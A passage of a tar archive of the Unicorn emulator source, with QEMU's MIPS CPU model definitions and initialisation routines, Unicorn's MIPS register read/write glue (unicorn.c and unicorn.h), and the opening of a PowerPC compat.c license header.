FCR31_ABS2008) | (1 << FCR31_NAN2008), .CP1_fcr31_rw_bitmask = 0x0103FFFF, .SEGBITS = 32, .PABITS = 32, .insn_flags = CPU_MIPS32R6 | ASE_MICROMIPS, .mmu_type = MMU_TYPE_R4000, }, { .name = "I7200", .CP0_PRid = 0x00010000, .CP0_Config0 = MIPS_CONFIG0 | (1 << CP0C0_MM) | (0x2 << CP0C0_AR) | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = (1U << CP0C1_M) | (15 << CP0C1_MMU) | (2 << CP0C1_IS) | (4 << CP0C1_IL) | (3 << CP0C1_IA) | (2 << CP0C1_DS) | (4 << CP0C1_DL) | (3 << CP0C1_DA) | (1 << CP0C1_PC) | (1 << CP0C1_EP), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3 | (1U << CP0C3_M) | (1 << CP0C3_CMGCR) | (1 << CP0C3_BI) | (1 << CP0C3_SC) | (3 << CP0C3_MMAR) | (1 << CP0C3_ISA_ON_EXC) | (1 << CP0C3_ISA) | (1 << CP0C3_ULRI) | (1 << CP0C3_RXI) | (1 << CP0C3_DSP2P) | (1 << CP0C3_DSPP) | (1 << CP0C3_CTXTC) | (1 << CP0C3_VInt) | (1 << CP0C3_CDMM) | (1 << CP0C3_MT) | (1 << CP0C3_TL), .CP0_Config4 = MIPS_CONFIG4 | (0xfc << CP0C4_KScrExist) | (2 << CP0C4_IE) | (1U << CP0C4_M), .CP0_Config5 = MIPS_CONFIG5 | (1 << CP0C5_MVH) | (1 << CP0C5_LLB), .CP0_Config5_rw_bitmask = (1 << CP0C5_SBRI) | (1 << CP0C5_FRE) | (1 << CP0C5_UFE), .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 0, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x3158FF1F, .CP0_PageGrain = (1 << CP0PG_IEC) | (1 << CP0PG_XIE) | (1U << CP0PG_RIE), .CP0_PageGrain_rw_bitmask = 0, .CP1_fcr0 = (1 << FCR0_FREP) | (1 << FCR0_HAS2008) | (1 << FCR0_F64) | (1 << FCR0_L) | (1 << FCR0_W) | (1 << FCR0_D) | (1 << FCR0_S) | (0x02 << FCR0_PRID) | (0x0 << FCR0_REV), .CP1_fcr31 = (1 << FCR31_ABS2008) | (1 << FCR31_NAN2008), .SEGBITS = 32, .PABITS = 32, .insn_flags = CPU_NANOMIPS32 | ASE_DSP | ASE_DSP_R2 | ASE_DSP_R3 | ASE_MT, .mmu_type = MMU_TYPE_R4000, }, #if defined(TARGET_MIPS64) { .name = "R4000", .CP0_PRid = 0x00000400, /* No L2 cache, icache size 8k, dcache size 8k, uncached coherency. */ .CP0_Config0 = (1 << 17) | (0x1 << 9) | (0x1 << 6) | (0x2 << CP0C0_K0), /* Note: Config1 is only used internally, the R4000 has only Config0. */ .CP0_Config1 = (1 << CP0C1_FP) | (47 << CP0C1_MMU), .CP0_LLAddr_rw_bitmask = 0xFFFFFFFF, .CP0_LLAddr_shift = 4, .SYNCI_Step = 16, .CCRes = 2, .CP0_Status_rw_bitmask = 0x3678FFFF, /* The R4000 has a full 64bit FPU but doesn't use the fcr0 bits. */ .CP1_fcr0 = (0x5 << FCR0_PRID) | (0x0 << FCR0_REV), .CP1_fcr31 = 0, .CP1_fcr31_rw_bitmask = 0x0183FFFF, .SEGBITS = 40, .PABITS = 36, .insn_flags = CPU_MIPS3, .mmu_type = MMU_TYPE_R4000, }, { .name = "VR5432", .CP0_PRid = 0x00005400, /* No L2 cache, icache size 8k, dcache size 8k, uncached coherency. */ .CP0_Config0 = (1 << 17) | (0x1 << 9) | (0x1 << 6) | (0x2 << CP0C0_K0), .CP0_Config1 = (1 << CP0C1_FP) | (47 << CP0C1_MMU), .CP0_LLAddr_rw_bitmask = 0xFFFFFFFFL, .CP0_LLAddr_shift = 4, .SYNCI_Step = 16, .CCRes = 2, .CP0_Status_rw_bitmask = 0x3678FFFF, /* The VR5432 has a full 64bit FPU but doesn't use the fcr0 bits. */ .CP1_fcr0 = (0x54 << FCR0_PRID) | (0x0 << FCR0_REV), .CP1_fcr31 = 0, .CP1_fcr31_rw_bitmask = 0xFF83FFFF, .SEGBITS = 40, .PABITS = 32, .insn_flags = CPU_VR54XX, .mmu_type = MMU_TYPE_R4000, }, { .name = "5Kc", .CP0_PRid = 0x00018100, .CP0_Config0 = MIPS_CONFIG0 | (0x2 << CP0C0_AT) | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (31 << CP0C1_MMU) | (1 << CP0C1_IS) | (4 << CP0C1_IL) | (1 << CP0C1_IA) | (1 << CP0C1_DS) | (4 << CP0C1_DL) | (1 << CP0C1_DA) | (1 << CP0C1_PC) | (1 << CP0C1_WR) | (1 << CP0C1_EP), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3, .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 4, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x12F8FFFF, .SEGBITS = 42, .PABITS = 36, .insn_flags = CPU_MIPS64, .mmu_type = MMU_TYPE_R4000, }, { .name = "5Kf", .CP0_PRid = 0x00018100, .CP0_Config0 = MIPS_CONFIG0 | (0x2 << CP0C0_AT) | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (1 << CP0C1_FP) | (31 << CP0C1_MMU) | (1 << CP0C1_IS) | (4 << CP0C1_IL) | (1 << CP0C1_IA) | (1 << CP0C1_DS) | (4 << CP0C1_DL) | (1 << CP0C1_DA) | (1 << CP0C1_PC) | (1 << CP0C1_WR) | (1 << CP0C1_EP), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3, .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 4, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x36F8FFFF, /* The 5Kf has F64 / L / W but doesn't use the fcr0 bits. */ .CP1_fcr0 = (1 << FCR0_D) | (1 << FCR0_S) | (0x81 << FCR0_PRID) | (0x0 << FCR0_REV), .CP1_fcr31 = 0, .CP1_fcr31_rw_bitmask = 0xFF83FFFF, .SEGBITS = 42, .PABITS = 36, .insn_flags = CPU_MIPS64, .mmu_type = MMU_TYPE_R4000, }, { .name = "20Kc", /* We emulate a later version of the 20Kc, earlier ones had a broken WAIT instruction. */ .CP0_PRid = 0x000182a0, .CP0_Config0 = MIPS_CONFIG0 | (0x2 << CP0C0_AT) | (MMU_TYPE_R4000 << CP0C0_MT) | (1 << CP0C0_VI), .CP0_Config1 = MIPS_CONFIG1 | (1 << CP0C1_FP) | (47 << CP0C1_MMU) | (2 << CP0C1_IS) | (4 << CP0C1_IL) | (3 << CP0C1_IA) | (2 << CP0C1_DS) | (4 << CP0C1_DL) | (3 << CP0C1_DA) | (1 << CP0C1_PC) | (1 << CP0C1_WR) | (1 << CP0C1_EP), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3, .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 0, .SYNCI_Step = 32, .CCRes = 1, .CP0_Status_rw_bitmask = 0x36FBFFFF, /* The 20Kc has F64 / L / W but doesn't use the fcr0 bits. */ .CP1_fcr0 = (1 << FCR0_3D) | (1 << FCR0_PS) | (1 << FCR0_D) | (1 << FCR0_S) | (0x82 << FCR0_PRID) | (0x0 << FCR0_REV), .CP1_fcr31 = 0, .CP1_fcr31_rw_bitmask = 0xFF83FFFF, .SEGBITS = 40, .PABITS = 36, .insn_flags = CPU_MIPS64 | ASE_MIPS3D, .mmu_type = MMU_TYPE_R4000, }, { /* A generic CPU providing MIPS64 Release 2 features. FIXME: Eventually this should be replaced by a real CPU model. */ .name = "MIPS64R2-generic", .CP0_PRid = 0x00010000, .CP0_Config0 = MIPS_CONFIG0 | (0x1 << CP0C0_AR) | (0x2 << CP0C0_AT) | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (1 << CP0C1_FP) | (63 << CP0C1_MMU) | (2 << CP0C1_IS) | (4 << CP0C1_IL) | (3 << CP0C1_IA) | (2 << CP0C1_DS) | (4 << CP0C1_DL) | (3 << CP0C1_DA) | (1 << CP0C1_PC) | (1 << CP0C1_WR) | (1 << CP0C1_EP), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3 | (1 << CP0C3_LPA), .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 0, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x36FBFFFF, .CP0_EBaseWG_rw_bitmask = (1 << CP0EBase_WG), .CP1_fcr0 = (1 << FCR0_F64) | (1 << FCR0_3D) | (1 << FCR0_PS) | (1 << FCR0_L) | (1 << FCR0_W) | (1 << FCR0_D) | (1 << FCR0_S) | (0x00 << FCR0_PRID) | (0x0 << FCR0_REV), .CP1_fcr31 = 0, .CP1_fcr31_rw_bitmask = 0xFF83FFFF, .SEGBITS = 42, .PABITS = 36, .insn_flags = CPU_MIPS64R2 | ASE_MIPS3D, .mmu_type = MMU_TYPE_R4000, }, { .name = "5KEc", .CP0_PRid = 0x00018900, .CP0_Config0 = MIPS_CONFIG0 | (0x1 << CP0C0_AR) | (0x2 << CP0C0_AT) | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (31 << CP0C1_MMU) | (1 << CP0C1_IS) | (4 << CP0C1_IL) | (1 << CP0C1_IA) | (1 << CP0C1_DS) | (4 << CP0C1_DL) | (1 << CP0C1_DA) | (1 << CP0C1_PC) | (1 << CP0C1_WR) | (1 << CP0C1_EP), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3, .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 4, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x12F8FFFF, .SEGBITS = 42, .PABITS = 36, .insn_flags = CPU_MIPS64R2, .mmu_type = MMU_TYPE_R4000, }, { .name = "5KEf", .CP0_PRid = 0x00018900, .CP0_Config0 = MIPS_CONFIG0 | (0x1 << CP0C0_AR) | (0x2 << CP0C0_AT) | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (1 << CP0C1_FP) | (31 << CP0C1_MMU) | (1 << CP0C1_IS) | (4 << CP0C1_IL) | (1 << CP0C1_IA) | (1 << CP0C1_DS) | (4 << CP0C1_DL) | (1 << CP0C1_DA) | (1 << CP0C1_PC) | (1 << CP0C1_WR) | (1 << CP0C1_EP), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3, .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 4, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x36F8FFFF, .CP1_fcr0 = (1 << FCR0_F64) | (1 << FCR0_L) | (1 << FCR0_W) | (1 << FCR0_D) | (1 << FCR0_S) | (0x89 << FCR0_PRID) | (0x0 << FCR0_REV), .SEGBITS = 42, .PABITS = 36, .insn_flags = CPU_MIPS64R2, .mmu_type = MMU_TYPE_R4000, }, { .name = "I6400", .CP0_PRid = 0x1A900, .CP0_Config0 = MIPS_CONFIG0 | (0x2 << CP0C0_AR) | (0x2 << CP0C0_AT) | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (1 << CP0C1_FP) | (15 << CP0C1_MMU) | (2 << CP0C1_IS) | (5 << CP0C1_IL) | (3 << CP0C1_IA) | (2 << CP0C1_DS) | (5 << CP0C1_DL) | (3 << CP0C1_DA) | (0 << CP0C1_PC) | (1 << CP0C1_WR) | (1 << CP0C1_EP), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3 | (1U << CP0C3_M) | (1 << CP0C3_CMGCR) | (1 << CP0C3_MSAP) | (1 << CP0C3_BP) | (1 << CP0C3_BI) | (1 << CP0C3_ULRI) | (1 << CP0C3_RXI) | (1 << CP0C3_LPA) | (1 << CP0C3_VInt), .CP0_Config4 = MIPS_CONFIG4 | (1U << CP0C4_M) | (3 << CP0C4_IE) | (1 << CP0C4_AE) | (0xfc << CP0C4_KScrExist), .CP0_Config5 = MIPS_CONFIG5 | (1 << CP0C5_XNP) | (1 << CP0C5_VP) | (1 << CP0C5_LLB) | (1 << CP0C5_MRP), .CP0_Config5_rw_bitmask = (1 << CP0C5_MSAEn) | (1 << CP0C5_SBRI) | (1 << CP0C5_FRE) | (1 << CP0C5_UFE), .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 0, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x30D8FFFF, .CP0_PageGrain = (1 << CP0PG_IEC) | (1 << CP0PG_XIE) | (1U << CP0PG_RIE), .CP0_PageGrain_rw_bitmask = (1 << CP0PG_ELPA), .CP0_EBaseWG_rw_bitmask = (1 << CP0EBase_WG), .CP1_fcr0 = (1 << FCR0_FREP) | (1 << FCR0_HAS2008) | (1 << FCR0_F64) | (1 << FCR0_L) | (1 << FCR0_W) | (1 << FCR0_D) | (1 << FCR0_S) | (0x03 << FCR0_PRID) | (0x0 << FCR0_REV), .CP1_fcr31 = (1 << FCR31_ABS2008) | (1 << FCR31_NAN2008), .CP1_fcr31_rw_bitmask = 0x0103FFFF, .MSAIR = 0x03 << MSAIR_ProcID, .SEGBITS = 48, .PABITS = 48, .insn_flags = CPU_MIPS64R6 | ASE_MSA, .mmu_type = MMU_TYPE_R4000, }, { .name = "I6500", .CP0_PRid = 0x1B000, .CP0_Config0 = MIPS_CONFIG0 | (0x2 << CP0C0_AR) | (0x2 << CP0C0_AT) | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (1 << CP0C1_FP) | (15 << CP0C1_MMU) | (2 << CP0C1_IS) | (5 << CP0C1_IL) | (3 << CP0C1_IA) | (2 << CP0C1_DS) | (5 << CP0C1_DL) | (3 << CP0C1_DA) | (0 << CP0C1_PC) | (1 << CP0C1_WR) | (1 << CP0C1_EP), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3 | (1U << CP0C3_M) | (1 << CP0C3_CMGCR) | (1 << CP0C3_MSAP) | (1 << CP0C3_BP) | (1 << CP0C3_BI) | (1 << CP0C3_ULRI) | (1 << CP0C3_RXI) | (1 << CP0C3_LPA) | (1 << CP0C3_VInt), .CP0_Config4 = MIPS_CONFIG4 | (1U << CP0C4_M) | (3 << CP0C4_IE) | (1 << CP0C4_AE) | (0xfc << CP0C4_KScrExist), .CP0_Config5 = MIPS_CONFIG5 | (1 << CP0C5_XNP) | (1 << CP0C5_VP) | (1 << CP0C5_LLB) | (1 << CP0C5_MRP), .CP0_Config5_rw_bitmask = (1 << CP0C5_MSAEn) | (1 << CP0C5_SBRI) | (1 << CP0C5_FRE) | (1 << CP0C5_UFE), .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 0, .SYNCI_Step = 64, .CCRes = 2, .CP0_Status_rw_bitmask = 0x30D8FFFF, .CP0_PageGrain = (1 << CP0PG_IEC) | (1 << CP0PG_XIE) | (1U << CP0PG_RIE), .CP0_PageGrain_rw_bitmask = (1 << CP0PG_ELPA), .CP0_EBaseWG_rw_bitmask = (1 << CP0EBase_WG), .CP1_fcr0 = (1 << FCR0_FREP) | (1 << FCR0_HAS2008) | (1 << FCR0_F64) | (1 << FCR0_L) | (1 << FCR0_W) | (1 << FCR0_D) | (1 << FCR0_S) | (0x03 << FCR0_PRID) | (0x0 << FCR0_REV), .CP1_fcr31 = (1 << FCR31_ABS2008) | (1 << FCR31_NAN2008), .CP1_fcr31_rw_bitmask = 0x0103FFFF, .MSAIR = 0x03 << MSAIR_ProcID, .SEGBITS = 48, .PABITS = 48, .insn_flags = CPU_MIPS64R6 | ASE_MSA, .mmu_type = MMU_TYPE_R4000, }, { .name = "Loongson-2E", .CP0_PRid = 0x6302, /* 64KB I-cache and d-cache. 4 way with 32 bit cache line size. */ .CP0_Config0 = (0x1<<17) | (0x1<<16) | (0x1<<11) | (0x1<<8) | (0x1<<5) | (0x1<<4) | (0x1<<1), /* Note: Config1 is only used internally, Loongson-2E has only Config0. */ .CP0_Config1 = (1 << CP0C1_FP) | (47 << CP0C1_MMU), .SYNCI_Step = 16, .CCRes = 2, .CP0_Status_rw_bitmask = 0x35D0FFFF, .CP1_fcr0 = (0x5 << FCR0_PRID) | (0x1 << FCR0_REV), .CP1_fcr31 = 0, .CP1_fcr31_rw_bitmask = 0xFF83FFFF, .SEGBITS = 40, .PABITS = 40, .insn_flags = CPU_LOONGSON2E, .mmu_type = MMU_TYPE_R4000, }, { .name = "Loongson-2F", .CP0_PRid = 0x6303, /* 64KB I-cache and d-cache. 4 way with 32 bit cache line size. */ .CP0_Config0 = (0x1<<17) | (0x1<<16) | (0x1<<11) | (0x1<<8) | (0x1<<5) | (0x1<<4) | (0x1<<1), /* Note: Config1 is only used internally, Loongson-2F has only Config0. */ .CP0_Config1 = (1 << CP0C1_FP) | (47 << CP0C1_MMU), .SYNCI_Step = 16, .CCRes = 2, .CP0_Status_rw_bitmask = 0xF5D0FF1F, /* Bits 7:5 not writable. */ .CP1_fcr0 = (0x5 << FCR0_PRID) | (0x1 << FCR0_REV), .CP1_fcr31 = 0, .CP1_fcr31_rw_bitmask = 0xFF83FFFF, .SEGBITS = 40, .PABITS = 40, .insn_flags = CPU_LOONGSON2F, .mmu_type = MMU_TYPE_R4000, }, { /* A generic CPU providing MIPS64 DSP R2 ASE features. FIXME: Eventually this should be replaced by a real CPU model. */ .name = "mips64dspr2", .CP0_PRid = 0x00010000, .CP0_Config0 = MIPS_CONFIG0 | (0x1 << CP0C0_AR) | (0x2 << CP0C0_AT) | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (1 << CP0C1_FP) | (63 << CP0C1_MMU) | (2 << CP0C1_IS) | (4 << CP0C1_IL) | (3 << CP0C1_IA) | (2 << CP0C1_DS) | (4 << CP0C1_DL) | (3 << CP0C1_DA) | (1 << CP0C1_PC) | (1 << CP0C1_WR) | (1 << CP0C1_EP), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3 | (1U << CP0C3_M) | (1 << CP0C3_DSP2P) | (1 << CP0C3_DSPP) | (1 << CP0C3_LPA), .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 0, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x37FBFFFF, .CP1_fcr0 = (1 << FCR0_F64) | (1 << FCR0_3D) | (1 << FCR0_PS) | (1 << FCR0_L) | (1 << FCR0_W) | (1 << FCR0_D) | (1 << FCR0_S) | (0x00 << FCR0_PRID) | (0x0 << FCR0_REV), .CP1_fcr31 = 0, .CP1_fcr31_rw_bitmask = 0xFF83FFFF, .SEGBITS = 42, .PABITS = 36, .insn_flags = CPU_MIPS64R2 | ASE_DSP | ASE_DSP_R2, .mmu_type = MMU_TYPE_R4000, }, #endif }; const int mips_defs_number = ARRAY_SIZE(mips_defs); static void no_mmu_init (CPUMIPSState *env, const mips_def_t *def) { env->tlb->nb_tlb = 1; env->tlb->map_address = &no_mmu_map_address; } static void fixed_mmu_init (CPUMIPSState *env, const mips_def_t *def) { env->tlb->nb_tlb = 1; env->tlb->map_address = &fixed_mmu_map_address; } static void r4k_mmu_init (CPUMIPSState *env, const mips_def_t *def) { env->tlb->nb_tlb = 1 + ((def->CP0_Config1 >> CP0C1_MMU) & 63); env->tlb->map_address = &r4k_map_address; env->tlb->helper_tlbwi = r4k_helper_tlbwi; env->tlb->helper_tlbwr = r4k_helper_tlbwr; env->tlb->helper_tlbp = r4k_helper_tlbp; env->tlb->helper_tlbr = r4k_helper_tlbr; env->tlb->helper_tlbinv = r4k_helper_tlbinv; env->tlb->helper_tlbinvf = r4k_helper_tlbinvf; } static void mmu_init (CPUMIPSState *env, const mips_def_t *def) { env->tlb = g_malloc0(sizeof(CPUMIPSTLBContext)); switch (def->mmu_type) { case MMU_TYPE_NONE: no_mmu_init(env, def); break; case MMU_TYPE_R4000: r4k_mmu_init(env, def); break; case MMU_TYPE_FMT: fixed_mmu_init(env, def); break; case MMU_TYPE_R3000: case MMU_TYPE_R6000: case MMU_TYPE_R8000: default: cpu_abort(env_cpu(env), "MMU type not supported\n"); } } static void fpu_init (CPUMIPSState *env, const mips_def_t *def) { int i; for (i = 0; i < MIPS_FPU_MAX; i++) env->fpus[i].fcr0 = def->CP1_fcr0; memcpy(&env->active_fpu, &env->fpus[0], sizeof(env->active_fpu)); } static void mvp_init (CPUMIPSState *env, const mips_def_t *def) { env->mvp = g_malloc0(sizeof(CPUMIPSMVPContext)); /* MVPConf1 implemented, TLB sharable, no gating storage support, programmable cache partitioning implemented, number of allocatable and sharable TLB entries, MVP has allocatable TCs, 2 VPEs implemented, 5 TCs implemented. */ env->mvp->CP0_MVPConf0 = (1U << CP0MVPC0_M) | (1 << CP0MVPC0_TLBS) | (0 << CP0MVPC0_GS) | (1 << CP0MVPC0_PCP) | // TODO: actually do 2 VPEs. // (1 << CP0MVPC0_TCA) | (0x1 << CP0MVPC0_PVPE) | // (0x04 << CP0MVPC0_PTC); (1 << CP0MVPC0_TCA) | (0x0 << CP0MVPC0_PVPE) | (0x00 << CP0MVPC0_PTC); /* Usermode has no TLB support */ env->mvp->CP0_MVPConf0 |= (env->tlb->nb_tlb << CP0MVPC0_PTLBE); /* Allocatable CP1 have media extensions, allocatable CP1 have FP support, no UDI implemented, no CP2 implemented, 1 CP1 implemented. */ env->mvp->CP0_MVPConf1 = (1U << CP0MVPC1_CIM) | (1 << CP0MVPC1_CIF) | (0x0 << CP0MVPC1_PCX) | (0x0 << CP0MVPC1_PCP2) | (0x1 << CP0MVPC1_PCP1); } static void msa_reset(CPUMIPSState *env) { /* MSA CSR: - non-signaling floating point exception mode off (NX bit is 0) - Cause, Enables, and Flags are all 0 - round to nearest / ties to even (RM bits are 0) */ env->active_tc.msacsr = 0; restore_msa_fp_status(env); /* tininess detected after rounding.*/ set_float_detect_tininess(float_tininess_after_rounding, &env->active_tc.msa_fp_status); /* clear float_status exception flags */ set_float_exception_flags(0, &env->active_tc.msa_fp_status); /* clear float_status nan mode */ set_default_nan_mode(0, &env->active_tc.msa_fp_status); /* set proper signanling bit meaning ("1" means "quiet") */ set_snan_bit_is_one(0, &env->active_tc.msa_fp_status); } ����������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/mips/unicorn.c������������������������������������������������������������0000664�0000000�0000000�00000011544�14675241067�0020237�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ /* Modified for Unicorn Engine by Chen Huitao<chenhuitao@hfmrit.com>, 2020 */ #include "sysemu/cpus.h" #include "cpu.h" #include "unicorn_common.h" #include "uc_priv.h" #include "unicorn.h" #include "internal.h" #ifdef TARGET_MIPS64 typedef uint64_t mipsreg_t; #else typedef uint32_t mipsreg_t; #endif MIPSCPU *cpu_mips_init(struct uc_struct *uc); static void mips_set_pc(struct uc_struct *uc, uint64_t address) { ((CPUMIPSState *)uc->cpu->env_ptr)->active_tc.PC = address; } static uint64_t mips_get_pc(struct uc_struct *uc) { return ((CPUMIPSState *)uc->cpu->env_ptr)->active_tc.PC; } static void mips_release(void *ctx) { int i; TCGContext *tcg_ctx = (TCGContext *)ctx; MIPSCPU *cpu = (MIPSCPU *)tcg_ctx->uc->cpu; CPUTLBDesc *d = cpu->neg.tlb.d; CPUTLBDescFast *f = cpu->neg.tlb.f; CPUTLBDesc *desc; CPUTLBDescFast *fast; release_common(ctx); for (i = 0; i < NB_MMU_MODES; i++) { desc = &(d[i]); fast = &(f[i]); g_free(desc->iotlb); g_free(fast->table); } g_free(cpu->env.mvp); g_free(cpu->env.tlb); } static void reg_reset(struct uc_struct *uc) { CPUArchState *env; (void)uc; env = uc->cpu->env_ptr; memset(env->active_tc.gpr, 0, sizeof(env->active_tc.gpr)); env->active_tc.PC = 0; } DEFAULT_VISIBILITY uc_err reg_read(void *_env, int mode, unsigned int regid, void *value, size_t *size) { CPUMIPSState *env = _env; uc_err ret = UC_ERR_ARG; if (regid >= UC_MIPS_REG_0 && regid <= UC_MIPS_REG_31) { CHECK_REG_TYPE(mipsreg_t); *(mipsreg_t *)value = env->active_tc.gpr[regid - UC_MIPS_REG_0]; } else { switch (regid) { default: break; case UC_MIPS_REG_HI: CHECK_REG_TYPE(mipsreg_t); *(mipsreg_t *)value = env->active_tc.HI[0]; break; case UC_MIPS_REG_LO: CHECK_REG_TYPE(mipsreg_t); *(mipsreg_t *)value = env->active_tc.LO[0]; break; case UC_MIPS_REG_PC: CHECK_REG_TYPE(mipsreg_t); *(mipsreg_t *)value = env->active_tc.PC; break; case UC_MIPS_REG_CP0_CONFIG3: CHECK_REG_TYPE(mipsreg_t); *(mipsreg_t *)value = env->CP0_Config3; break; case UC_MIPS_REG_CP0_STATUS: CHECK_REG_TYPE(mipsreg_t); *(mipsreg_t *)value = env->CP0_Status; break; case UC_MIPS_REG_CP0_USERLOCAL: CHECK_REG_TYPE(mipsreg_t); *(mipsreg_t *)value = env->active_tc.CP0_UserLocal; break; } } return ret; } DEFAULT_VISIBILITY uc_err reg_write(void *_env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc) { CPUMIPSState *env = _env; uc_err ret = UC_ERR_ARG; if (regid >= UC_MIPS_REG_0 && regid <= UC_MIPS_REG_31) { CHECK_REG_TYPE(mipsreg_t); env->active_tc.gpr[regid - UC_MIPS_REG_0] = *(mipsreg_t *)value; } else { switch (regid) { default: break; case UC_MIPS_REG_HI: CHECK_REG_TYPE(mipsreg_t); env->active_tc.HI[0] = *(mipsreg_t *)value; break; case UC_MIPS_REG_LO: CHECK_REG_TYPE(mipsreg_t); env->active_tc.LO[0] = *(mipsreg_t *)value; break; case UC_MIPS_REG_PC: CHECK_REG_TYPE(mipsreg_t); env->active_tc.PC = *(mipsreg_t *)value; *setpc = 1; break; case UC_MIPS_REG_CP0_CONFIG3: CHECK_REG_TYPE(mipsreg_t); env->CP0_Config3 = *(mipsreg_t *)value; break; case UC_MIPS_REG_CP0_STATUS: // TODO: ALL CP0 REGS // https://s3-eu-west-1.amazonaws.com/downloads-mips/documents/MD00090-2B-MIPS32PRA-AFP-06.02.pdf // https://s3-eu-west-1.amazonaws.com/downloads-mips/documents/MD00582-2B-microMIPS32-AFP-05.04.pdf CHECK_REG_TYPE(mipsreg_t); env->CP0_Status = *(mipsreg_t *)value; compute_hflags(env); break; case UC_MIPS_REG_CP0_USERLOCAL: CHECK_REG_TYPE(mipsreg_t); env->active_tc.CP0_UserLocal = *(mipsreg_t *)value; break; } } return ret; } static int mips_cpus_init(struct uc_struct *uc, const char *cpu_model) { MIPSCPU *cpu; cpu = cpu_mips_init(uc); if (cpu == NULL) { return -1; } return 0; } DEFAULT_VISIBILITY void uc_init(struct uc_struct *uc) { uc->reg_read = reg_read; uc->reg_write = reg_write; uc->reg_reset = reg_reset; uc->release = mips_release; uc->set_pc = mips_set_pc; uc->get_pc = mips_get_pc; uc->cpus_init = mips_cpus_init; uc->cpu_context_size = offsetof(CPUMIPSState, end_reset_fields); uc_common_init(uc); } ������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/mips/unicorn.h������������������������������������������������������������0000664�0000000�0000000�00000002523�14675241067�0020241�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ #ifndef UC_QEMU_TARGET_MIPS_H #define UC_QEMU_TARGET_MIPS_H // functions to read & write registers uc_err reg_read_mips(void *env, int mode, unsigned int regid, void *value, size_t *size); uc_err reg_read_mipsel(void *env, int mode, unsigned int regid, void *value, size_t *size); uc_err reg_read_mips64(void *env, int mode, unsigned int regid, void *value, size_t *size); uc_err reg_read_mips64el(void *env, int mode, unsigned int regid, void *value, size_t *size); uc_err reg_write_mips(void *env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc); uc_err reg_write_mipsel(void *env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc); uc_err reg_write_mips64(void *env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc); uc_err reg_write_mips64el(void *env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc); void uc_init_mips(struct uc_struct *uc); void uc_init_mipsel(struct uc_struct *uc); void uc_init_mips64(struct uc_struct *uc); void uc_init_mips64el(struct uc_struct *uc); #endif �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/����������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016223�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/compat.c��������������������������������������������������������������0000664�0000000�0000000�00000022125�14675241067�0017654�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * PowerPC CPU initialization for qemu. * * Copyright 2016, David Gibson, Red Hat Inc. <dgibson@redhat.com> * * This library is free software; you can redistribute it 